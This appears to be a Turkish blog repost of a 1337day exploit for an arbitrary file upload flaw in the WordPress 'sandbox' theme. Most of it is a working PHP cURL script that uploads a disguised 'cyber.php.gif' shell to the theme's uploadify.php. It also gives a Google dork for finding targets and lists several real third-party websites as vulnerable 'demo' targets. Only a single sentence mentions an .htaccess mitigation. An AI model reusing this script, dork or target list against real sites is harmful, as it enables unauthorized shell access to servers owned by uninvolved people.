WordPress theme sandbox Arbitrary File Upload Vulnerability

WordPress theme sandbox Arbitrary eklentisinde File Upload açığı bulundu.
Açık sayesinde php Shell upload edilebilmekte servere erişim sağlanmaktadır.
wordpress upload dizinlerine php.php, php.gif, php.jpg gibi uzantıları engelleyecek .htaccess dosyası oluşturulmalıdır.
Açık hakkında açıklamalar ve açığa ait exploit.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm The Black Devils member from Inj3ct0r Team         1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: WordPress theme sandbox Arbitrary File Upload/FD Vulnerability
# Date: 21/12/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ webapps ]
# Dork : inurl:wp-content/themes/sandbox
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------
<?php
$uploadfile="cyber.php.gif";
$ch = curl_init("http://localhost/wp-content/themes/sandbox/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://localhost/wp-content/themes/sandbox/js/uploadify/cyber.php.gif
<?php
phpinfo();
?>
#------------------
Demo 
 
http://www.les-monstres.us/wp-content/themes/sandbox/header.php
http://teavalecottages.co.ke/wp-content/themes/sandbox/header.php
http://www.dealmatters.com/temp/wp-content/themes/sandbox/header.php
http://divine-worx.com/wp-content/themes/sandbox/header.php
 
http://teavalecottages.co.ke/wp-content/themes/sandbox/js/uploadify/uploadify.php
http://www.les-monstres.us/wp-content/themes/sandbox/js/uploadify/uploadify.php
http://www.infinityitpark.in/wp-content/themes/sandbox/js/uploadify/uploadify.php
 
 
 
 
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir